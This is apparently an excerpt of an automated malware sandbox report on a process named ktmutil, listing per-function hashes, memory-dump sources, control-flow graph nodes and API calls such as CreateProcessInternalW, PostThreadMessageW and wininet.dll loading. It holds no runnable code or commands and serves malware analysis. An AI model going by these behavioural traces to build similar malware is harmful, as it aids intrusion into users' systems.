              • Opcode Fuzzy Hash: f32f46fb54fd144336d660922f9ee0bc23f849c9aac5697dc13d217caf11ef43
              • Instruction Fuzzy Hash: 7890023165141502D541B1584405617000A87D0241F95D022B6024555FCA258AD2E531
              Function 02E42FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: da4e4b4ebe5b72da253a905b196852cdada2e7e6e3dbf26d21486d0a023af180
              • Instruction ID: 5e47d0e5e42e7a50f7101a3bf4f70a386d99cfe6e29186917f1b0404a538d913
              • Opcode Fuzzy Hash: da4e4b4ebe5b72da253a905b196852cdada2e7e6e3dbf26d21486d0a023af180
              • Instruction Fuzzy Hash: 4A900231261C1042D640B5684C15B07000587D0303F55D115B5154554DC91589A19921
              Function 02E42FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 8c8d938a541ff6e23fc83d08ebc6c7ed182504b5125bec1bd0be20678fd785a7
              • Instruction ID: d422e3f5caf89f05b1719549297e6e9ff10b6ba0039a16d7a9473a9d99e6eba3
              • Opcode Fuzzy Hash: 8c8d938a541ff6e23fc83d08ebc6c7ed182504b5125bec1bd0be20678fd785a7
              • Instruction Fuzzy Hash: B8900231651410424580B16888459074005ABE1211755D121B5998550E855989A59A65
              Function 02E42F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 29b3b979c2a63a5268f9216c34479eec7bfae3b447128ac530cb4d7fed26fd98
              • Instruction ID: 19fcb5596df0f03b289309639773a11e981e8d0d8270c265d24ee16945f0cbe4
              • Opcode Fuzzy Hash: 29b3b979c2a63a5268f9216c34479eec7bfae3b447128ac530cb4d7fed26fd98
              • Instruction Fuzzy Hash: 4890027139141442D540B1584415B070005C7E1301F55D015F6064554E8619CD92A526
              Function 02E42CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 735d7c5da3fdd7f230bd6b9edfe12bc9ba639ee37898a2c7110bbcb298d1c17d
              • Instruction ID: bc0a7c1430f75d23cfdf6efa060319d5c8138e4bdd0a5e3f6b4e5cf5fc3e46a8
              • Opcode Fuzzy Hash: 735d7c5da3fdd7f230bd6b9edfe12bc9ba639ee37898a2c7110bbcb298d1c17d
              • Instruction Fuzzy Hash: 8C90023125141402D540B5985409647000587E0301F55E011BA024555FC66589D1A531
              Function 02E42C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: f4f2e0b4147e9f8763f5d1877fe30728417b8f89953816f6a4f6f7df12ea51ca
              • Instruction ID: 02a15c00961f5fda098555729f0e054a18bbf507e110a04d3de4643a370ebb79
              • Opcode Fuzzy Hash: f4f2e0b4147e9f8763f5d1877fe30728417b8f89953816f6a4f6f7df12ea51ca
              • Instruction Fuzzy Hash: 6A90023125141842D540B1584405B47000587E0301F55D016B5124654E8615C991B921
              Function 02E42C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 51064b7fc9cccd2d04e8a3cc9986e348ebcf089ccd258bfb9ba003dbfa812100
              • Instruction ID: 4f06d8d8e5142ff2d1ed74a299937a3c7e52f6c808b50b0d9745964f3f7508c0
              • Opcode Fuzzy Hash: 51064b7fc9cccd2d04e8a3cc9986e348ebcf089ccd258bfb9ba003dbfa812100
              • Instruction Fuzzy Hash: 3E90023125149802D550B158840574B000587D0301F59D411B9424658E869589D1B521
              Function 02E42DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 543428a42e9e1f51ff4f881879339876efb290cba1c197228fcb1e5bb7d2c8b4
              • Instruction ID: 4ed2e90ad178f62ed9a3f23a041237603b8f2f51c269c6f4c40963b4904c7e16
              • Opcode Fuzzy Hash: 543428a42e9e1f51ff4f881879339876efb290cba1c197228fcb1e5bb7d2c8b4
              • Instruction Fuzzy Hash: 7090023125141413D551B1584505707000987D0241F95D412B5424558E96568A92E521
              Function 02E42DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 45b88ce04ffc758d838e84d8efa99da1179c7a629bcb3a8dac91b4c0d93196d8
              • Instruction ID: e9157259549d49850bea69443f19f03bf1a89e4fa62aa58209c98df435f96940
              • Opcode Fuzzy Hash: 45b88ce04ffc758d838e84d8efa99da1179c7a629bcb3a8dac91b4c0d93196d8
              • Instruction Fuzzy Hash: DB900231292451525985F1584405507400697E0241795D012B6414950D85269996DA21
              Function 02E42D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 875aed4ca40ab3247e9ee6219cd8884376144e20fc2e674f1301e3b50e5e4a58
              • Instruction ID: cbfd3e26dd8e5e605c90701f037e36174aea4ca36429c1d6818a3c49cbb6a3a6
              • Opcode Fuzzy Hash: 875aed4ca40ab3247e9ee6219cd8884376144e20fc2e674f1301e3b50e5e4a58
              • Instruction Fuzzy Hash: 3F90023135141003D580B15854196074005D7E1301F55E011F5414554DD91589969622
              Function 02E42D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
              • Associated: 0000000C.00000002.2982129519.0000000002EF9000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002EFD000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000C.00000002.2982129519.0000000002F6E000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_2dd0000_ktmutil.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 7eaa68c7129b3f96b645a8bbb324881c11da4d8f12c671c5ee9d2b2149e94263
              • Instruction ID: 795dd56161f6e1f50c0ccf5178bdf91a35789d441fab6f9f1db0ec6674dace60
              • Opcode Fuzzy Hash: 7eaa68c7129b3f96b645a8bbb324881c11da4d8f12c671c5ee9d2b2149e94263
              • Instruction Fuzzy Hash: 7490023926341002D5C0B158540960B000587D1202F95E415B5015558DC91589A99721
              Function 003AF17B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 121COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 489 3af17b-3af17c 490 3af11e 489->490 491 3af17e-3af1dc CoInitialize 489->491 492 3af127-3af13e 490->492 493 3af122 call 3bb3c0 490->493 496 3af1e5-3af1e7 491->496 494 3aefc1-3af026 call 3bb1d0 call 3bb3c0 492->494 495 3af144-3af14c 492->495 493->492 521 3af0f8-3af11f call 3bb3e0 494->521 522 3af02c-3af04a 494->522 497 3af27b-3af28b CoUninitialize 496->497 498 3af1ed-3af1fe 496->498 503 3af270-3af278 498->503 504 3af200-3af210 498->504 503->497 506 3af215-3af217 504->506 508 3af219-3af21e 506->508 509 3af262-3af26d 506->509 510 3af25a-3af260 508->510 511 3af220-3af22d call 3bb5c0 508->511 509->503 510->504 510->509 517 3af22f-3af231 511->517 518 3af234-3af256 call 3bb3c0 call 3bb1a0 511->518 517->518 518->510 533 3af14d-3af178 call 3b7740 521->533 534 3af121-3af122 call 3bb3c0 521->534 528 3af0ef-3af0f5 522->528 529 3af050-3af05a 522->529 528->521 532 3af060-3af071 529->532 535 3af07b-3af07e 532->535 536 3af073-3af079 532->536 534->492 539 3af081-3af089 535->539 536->539 540 3af08b-3af08d 539->540 541 3af08f 539->541 543 3af091-3af0a5 540->543 541->543 543->532 544 3af0a7-3af0b2 543->544 545 3af0bc-3af0bf 544->545 546 3af0b4-3af0ba 544->546 547 3af0c2-3af0ca 545->547 546->547 548 3af0cc-3af0ce 547->548 549 3af0d0 547->549 550 3af0d2-3af0e8 548->550 549->550 550->528
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: InitializeUninitialize
              • String ID: @J7<$S
              • API String ID: 3442037557-4024358435
              • Opcode ID: 46312136729c0ba2b3be9226c58ff8797c89a4e6330a31a1bef1864a8bae36a2
              • Instruction ID: a9dcb2f06cec2aa00c94ac73b2794743814781432e29889d94efb7131a47cf24
              • Opcode Fuzzy Hash: 46312136729c0ba2b3be9226c58ff8797c89a4e6330a31a1bef1864a8bae36a2
              • Instruction Fuzzy Hash: C7418275A0020A9FDB11DFD8D8809EEB7B9FF89304F108569E505EB210DB75EE058BA0
              Function 003A08B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 551 3a08b0-3a0948 553 3a094a-3a095e 551->553 554 3a0975-3a0988 551->554 555 3a098a-3a098c 554->555 556 3a0a04-3a0a5a call 3bbc30 call 3a4180 call 391410 call 3b18b0 554->556 555->556 557 3a098e-3a09c3 555->557 567 3a0a7a-3a0a80 556->567 568 3a0a5c-3a0a6b PostThreadMessageW 556->568 557->556 568->567 569 3a0a6d-3a0a77 568->569 569->567
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: a4603B1g$a4603B1g
              • API String ID: 0-2302878989
              • Opcode ID: 488b4b0a9382001cd019393e18b8036ce6b19b9619084eb3f9cd61f5811cfba4
              • Instruction ID: e780a613fe2753670d73fcad35a9616cedacf0ef80cb7d4d17338efd1b2e0e75
              • Opcode Fuzzy Hash: 488b4b0a9382001cd019393e18b8036ce6b19b9619084eb3f9cd61f5811cfba4
              • Instruction Fuzzy Hash: 2B31DF37804668BFDB269E68DC82AEFB77CEE86324B14845DD9509F202C331590387D1
              Function 003A09C9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 570 3a09c9-3a09cd 571 3a09cf-3a09e1 570->571 572 3a09f5-3a0a02 570->572 573 3a0a0a-3a0a0f 572->573 574 3a0a05 call 3bb220 572->574 575 3a0a15-3a0a5a call 3a4180 call 391410 call 3b18b0 573->575 576 3a0a10 call 3bbc30 573->576 574->573 583 3a0a7a-3a0a80 575->583 584 3a0a5c-3a0a6b PostThreadMessageW 575->584 576->575 584->583 585 3a0a6d-3a0a77 584->585 585->583
              APIs
              • PostThreadMessageW.USER32(a4603B1g,00000111,00000000,00000000), ref: 003A0A67
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID: a4603B1g$a4603B1g
              • API String ID: 1836367815-2302878989
              • Opcode ID: 703255aff6cd644c4466bdeb7847e53112778643a3fcc44f36c3a0b4fb07142c
              • Instruction ID: 30e3ee9d2e2b9cf3eca6a1f25c5b270443afd542613d4f232650d78ad885e6d4
              • Opcode Fuzzy Hash: 703255aff6cd644c4466bdeb7847e53112778643a3fcc44f36c3a0b4fb07142c
              • Instruction Fuzzy Hash: 8C11E772D4010C7EEB129AD59C82EEFBB7CDB467A4F408069FA08AB141D6755E0647B1
              Function 003A09E2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 586 3a09e2-3a0a0f call 3bb220 590 3a0a15-3a0a5a call 3a4180 call 391410 call 3b18b0 586->590 591 3a0a10 call 3bbc30 586->591 598 3a0a7a-3a0a80 590->598 599 3a0a5c-3a0a6b PostThreadMessageW 590->599 591->590 599->598 600 3a0a6d-3a0a77 599->600 600->598
              APIs
              • PostThreadMessageW.USER32(a4603B1g,00000111,00000000,00000000), ref: 003A0A67
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID: a4603B1g$a4603B1g
              • API String ID: 1836367815-2302878989
              • Opcode ID: ae6c9a5930b31d02452092fab402e546b86e3583aa398619668558ca509229b8
              • Instruction ID: 3b0fedd0e8059c2c83b22071d526013e47045ecc4343f8d4ce9a0074cb8d3569
              • Opcode Fuzzy Hash: ae6c9a5930b31d02452092fab402e546b86e3583aa398619668558ca509229b8
              • Instruction Fuzzy Hash: 16118675D0021C7EDB12AAE58C81EEFBB7CEF46794F058064FA14AB141D6745E064BA1
              Function 003A09F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 601 3a09f0-3a0a0f call 3bb220 604 3a0a15-3a0a5a call 3a4180 call 391410 call 3b18b0 601->604 605 3a0a10 call 3bbc30 601->605 612 3a0a7a-3a0a80 604->612 613 3a0a5c-3a0a6b PostThreadMessageW 604->613 605->604 613->612 614 3a0a6d-3a0a77 613->614 614->612
              APIs
              • PostThreadMessageW.USER32(a4603B1g,00000111,00000000,00000000), ref: 003A0A67
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID: a4603B1g$a4603B1g
              • API String ID: 1836367815-2302878989
              • Opcode ID: 42c4d09f60380a6ac578738a13915813b7865d36b66bf8fe4a57f401f169213c
              • Instruction ID: 73d7e0824c3b13c96fb5034d8c9cfaf483748d7cb5045a49b70e305401ec2984
              • Opcode Fuzzy Hash: 42c4d09f60380a6ac578738a13915813b7865d36b66bf8fe4a57f401f169213c
              • Instruction Fuzzy Hash: 8F019672D0021C7EEB12AAE58C82EEFBB7CDF45794F058064FA04BB141D6745E0647B1
              Function 003B3760 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 003B383B
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: 1b8a5507b2bc47722b8b04186d296f8692b5ee191683a2e1bcade8f1de106259
              • Instruction ID: 75017a4641fcd8d0925c99d63e9d42ddfc1bded95bdfeec8d8eecb0fbbc9b39e
              • Opcode Fuzzy Hash: 1b8a5507b2bc47722b8b04186d296f8692b5ee191683a2e1bcade8f1de106259
              • Instruction Fuzzy Hash: A03190B1A01605BBD715DFA4CC81FEBBBBCEB88704F04452CBA19AB241D7706B44CBA5
              Function 003AF180 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: InitializeUninitialize
              • String ID: @J7<
              • API String ID: 3442037557-2016760708
              • Opcode ID: abf82f07030356be4ea017b53c2d500cfe6d3c00c1b5197d059ea6240ee9c545
              • Instruction ID: 5a508256c8cbcde0ab5d830a3adeb6a27d241d7afc23430d56ef5d090bfd503c
              • Opcode Fuzzy Hash: abf82f07030356be4ea017b53c2d500cfe6d3c00c1b5197d059ea6240ee9c545
              • Instruction Fuzzy Hash: 8D3130B9A0020A9FDB11DFD8C8809EFB7B9FF89304B108559E515EB214D775EE058BA0
              Function 003AC3A6 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
              Download Yara Rule
              APIs
              • FindNextFileW.KERNELBASE(?,00000010), ref: 003AC38F
              • FindClose.KERNELBASE(?), ref: 003AC39A
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Find$CloseFileNext
              • String ID:
              • API String ID: 2066263336-0
              • Opcode ID: 1d9af6178bdfa8e57f43223b8fd9c01c0db59e9dd846720bdd629a69318d5666
              • Instruction ID: 3fa2dfffa8db754ff4845a7523f45abd1106be2f6c589b351b15d1c02e01f579
              • Opcode Fuzzy Hash: 1d9af6178bdfa8e57f43223b8fd9c01c0db59e9dd846720bdd629a69318d5666
              • Instruction Fuzzy Hash: 90E0927661014CABCB12DBA09C44CEF777CEF85B15F0081C9F80996001D6358B449790
              Function 003A4180 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003A41F2
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: b562ae60fd54ef7e74e4fbad3805424dc02d567235dc5e9e358a0258f6bb919e
              • Instruction ID: 5308f72893adaac4c0d23ee44e843a4529182a1057510ffb36e2e2e9209fdb37
              • Opcode Fuzzy Hash: b562ae60fd54ef7e74e4fbad3805424dc02d567235dc5e9e358a0258f6bb919e
              • Instruction Fuzzy Hash: 55011EB5E0020DBBDB11DBA4DC42FDDB7B8AB54308F0041A5EA089B641F671EB548B91
              Function 003B9490 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,003A7FAE,00000010,?,?,?,00000044,?,00000010,003A7FAE,?,00000000,?), ref: 003B94F0
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 63090f0baeb053bda6d4ac60e79ef039ec60d72c1d2e16f213e356ee6e17aee2
              • Instruction ID: 32860445fa680c3462c1e9349ea0c5c1e32880c722e6ee74cb2b929a132e7a7c
              • Opcode Fuzzy Hash: 63090f0baeb053bda6d4ac60e79ef039ec60d72c1d2e16f213e356ee6e17aee2
              • Instruction Fuzzy Hash: DE01C0B2214608BBCB44DF89DC81EDB77ADAF8C754F008108BA09E7241D631F9518BA4
              Function 00399AA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
              Download Yara Rule
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399AE5
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 11af324b4a60c09abd1f62ef8645fbb38898e5456f6142a1c9d3a5072eb7af22
              • Instruction ID: 656075ff99cf67e5423228f592cc21e405e7fb8b5dff84624898a0215ede74c9
              • Opcode Fuzzy Hash: 11af324b4a60c09abd1f62ef8645fbb38898e5456f6142a1c9d3a5072eb7af22
              • Instruction Fuzzy Hash: E0F06D3338021436E73161AA9C42FD7B29CDB80B61F24002AF70DEB2C0D892B90182E8
              Function 00399A9E Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
              Download Yara Rule
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399AE5
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 6d4f1229fcba532901cea21a074c56b1201924d4027cbacdeb0864da45f5760a
              • Instruction ID: ce5d62fffe968778c9698cd72a8abcf8f95c647d85d4f7a34afdbd6a18aa2038
              • Opcode Fuzzy Hash: 6d4f1229fcba532901cea21a074c56b1201924d4027cbacdeb0864da45f5760a
              • Instruction Fuzzy Hash: 28E0923228020433E63161AA8C43FD7725CCF80B50F240019F709EF2C0D891B90182E8
              Function 003A41FB Relevance: 1.5, APIs: 1, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a01e9167f8032926f0a8894ca66f941924564f316f1f19c19ea1cd2c057fbfa
              • Instruction ID: b884a01fa3bb69679dfa5d41a3686de7653fd648c82da8d81b501fc397221dc6
              • Opcode Fuzzy Hash: 0a01e9167f8032926f0a8894ca66f941924564f316f1f19c19ea1cd2c057fbfa
              • Instruction Fuzzy Hash: 1FF055145096AC7ACB22EE798802A83BFBADD87244F0404A8EAD067A03D544208A83D6
              Function 003B93B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(00000104,?,003B146C,?,?,003B146C,?,00000104,?), ref: 003B93EC
              Memory Dump Source
              • Source File: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_390000_ktmutil.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 653eda6beaca97580ca9b1e8a35783d7e959db80bf7dc2155313d5db26253e23
              • Instruction ID: d3fae740d9df7831b818a36a7c12cf5496848be4f3fda33ba6760474a91a949c
